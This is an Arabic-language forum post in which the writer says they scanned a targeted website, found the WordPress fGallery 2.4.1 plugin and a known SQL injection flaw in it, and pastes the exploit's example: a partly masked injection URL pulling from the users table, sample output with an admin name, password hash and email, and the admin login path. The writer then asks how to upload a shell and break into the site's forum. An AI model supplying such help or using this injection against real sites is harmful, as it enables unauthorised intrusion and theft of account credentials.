السلام عليكم..بحثت على سيرفر الموقع المستهدف عن سكربت فوجدت سكربت مشابه أسمها
fgallery
ولما حطيتها ف الموقع

جابلى ثغره واحده أسمهاWordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability
المهم أنه قالى طريقة أستخدامها بكده


Exemple :
http://site.il/wordpress/wp-*******/...m%20wp_users--

src='http://site.il/wordpress/wp-*******/fgallery/thumb_admin:051e3db4c8eee42d7c93df48dffe4d5f:marku [email protected]' /><br>5 [email protected] Thu, 01 Jan 1970 00:00:00 +0100

Info => admin:051e3db4c8eee42d7c93df48dffe4d5f:markus@swim atyourownrisk.com

admin login http://target.il/wordpress_path/wp/wp-login.php


أنا بقى مش عارف أستخدمها إزاى..وأرفع عليها شل إزاى..(أنا معنديش شيل)وإزاى أخترق المنتدى من خلالها..؟؟يارب حد يجاوبنى أنهرضه لأنى مش فاضى غير فيه بس..وألف شكر ليكو كلكو..